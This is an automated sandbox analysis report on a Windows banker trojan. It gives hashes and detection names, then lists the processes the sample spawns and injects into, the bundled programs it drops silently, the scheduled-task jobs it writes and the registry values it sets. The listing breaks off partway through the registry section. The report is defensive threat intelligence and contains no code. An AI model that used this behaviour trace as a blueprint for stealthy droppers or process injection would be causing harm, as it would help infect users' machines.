Trojan.Win32.Badur.kict (Kaspersky), Trojan.Generic.12152654 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 41115417ce44a83fc6e4343f11f8e63d
SHA1: 53068ee320b3e8bec8c55544c8f2dda38cd1ee96
SHA256: 862fda1c753b2ec5f7c6fbf7545a6604a464bdac84f1d475c9bf3d865c6e63ff
SSDeep: 12288:7HRbnuGLydXXv42SGQ1O53mLjGsY4seAgZrnej6JKcXnf:7HRbGL2v42TQomC4saZDeGJJf
Size: 712704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-24 16:47:16
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
yx_dts.exe:1476
%original file name%.exe:1452
notify.exe:2104
9158chat2_ktv083_98.exe:516
assistupdate.exe:2080
dts.exe:1728
dts.exe:1772
OfficeAssist.0419.80.1123.exe:744
OfficeAssist.0419.80.1123.exe:1752
regsvr32.exe:2136
regsvr32.exe:2716
regsvr32.exe:1280
regsvr32.exe:2280
regsvr32.exe:1124
regsvr32.exe:2940
9158.exe:2088
The Trojan injects its code into the following process(es):
MM-liao8398.exe:824
dts.exe:1940
1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process yx_dts.exe:1476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\大天使之剑.lnk (944 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe (29256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\大天使之剑.lnk (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw43.tmp (44165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\卸载大天使之剑.lnk (975 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\大天使之剑\大天使之剑.lnk (956 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (430 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe (11048 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw44.tmp\System.dll (0 bytes)
The process MM-liao8398.exe:824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CABBAJEH.htm (765 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\icons[1].gif (7 bytes)
C:\temp.icon (1444 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv083_98.exe.tmp (149051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xui[1].js (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
The process %original file name%.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1419052427l238l63518[1].exe (49889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027 (108 bytes)
The process notify.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_png24.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\util\json3.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\flowcontrol.zip.dt! (148 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\topad.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\utils.zip.dt! (20716 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\log\notify_2014_12_20.log (6560 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\flowcontrol\flowcontrol.htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\skin_top.png (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\jQuery.js (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\ui_con.png (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\down\meihua_mini.zip.dt! (92840 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading24.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\bg.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\main.css (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\warning.png (1 bytes)
%WinDir%\Tasks\PPTAssistantNotifyTask_adm.job (392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Utils.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading48.gif (1 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading16.gif (455 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\adbgimg.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\hostapi.js (14 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\js\load.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\index.html (7 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\minisite\1.0\script\css\img\loading.gif (5 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\Urchin.js (784 bytes)
%Documents and Settings%\%current user%\Application Data\pptassist\update\notify\utils\moment.js (784 bytes)
The process 9158chat2_ktv083_98.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc48.tmp (1080968 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\卸载 9158多人视频.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\9158多人视频.lnk (681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Desktop\9158多人视频.lnk (575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss49.tmp\loading2.bmp (0 bytes)
The process assistupdate.exe:2080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\PPTAssistantUpdateTask_adm.job (404 bytes)
The process dts.exe:1940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg2[1].jpg (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[2].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (2672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (392 bytes)
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (1234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\getcard[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[2].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\04190114Mvpaw[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[1].css (4432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\log[1].jpg (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\19204027FVrEy[1].jpg (5194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[2].js (3759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rem_on[1].jpg (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\101215116dbQk[1].jpg (2287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\1610242766g2O[1].jpg (2625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\game1[2].css (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[2].jpg (1883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wl[1].htm (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\client[1].htm (2395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].jpg (11642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
%Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\161046026iq7a[1].jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app[1].ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.core[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\sq.tab[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\sq.statis[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\sq.login[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1610242766g2O[1].jpg (0 bytes)
The process dts.exe:1728 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (72 bytes)
The process dts.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\dts\mydts\lander.ini (164 bytes)
The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
%Program Files%\MM-liao8398.exe (59304 bytes)
%Program Files%\2.ico (47632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
%Program Files%\onlines_30863.exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\1.rar (26 bytes)
%Program Files%\yx_dts.exe (58296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
%Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp (0 bytes)
The process OfficeAssist.0419.80.1123.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\卸载.lnk (994 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (0 bytes)
The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (0 bytes)
Registry activity
The process yx_dts.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"URLInfoAbout" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"DisplayVersion" = "3.1.0.0"
"Publisher" = "大天使之剑"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"DisplayName" = "大天使之剑"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
